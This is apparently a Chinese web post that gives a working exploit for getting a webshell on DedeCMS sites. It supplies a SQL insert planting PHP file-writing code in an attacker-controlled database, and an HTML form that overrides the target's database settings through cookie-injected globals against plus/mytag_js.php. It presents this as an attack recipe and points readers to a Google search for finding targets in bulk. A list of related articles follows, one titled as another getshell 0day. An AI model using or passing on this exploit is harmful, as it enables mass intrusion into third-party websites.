拿webshell的方法如下:
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,\'\'{dede:php}$fp = @fopen("1.php", \\'\'a\\'\');@fwrite($fp, \\'\'\\'\');echo "OK";@fclose($fp);{/dede:php}\'\');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
至于批量的方法自己去 谷歌搜索 "Powered by dedecms"
相关文章:
- 织梦CMS增加复制文档功能 2022-12-23
- 织梦dedecms 采集的文章重复或内容文章标题重复批量删除的解决方法 2022-12-23
- 织梦 {dede:list}列表按多种排序显示 2022-12-23
- 织梦模板调用最新文章标签、推荐内容标签、热门文章标签、栏目标签 2022-12-23
- 如何修改织梦后台左边导航栏目 2022-12-23
- appcms包含getshell 0day 2022-12-23
- 织梦所需的PHP版本和组件数量是什么 2023-03-21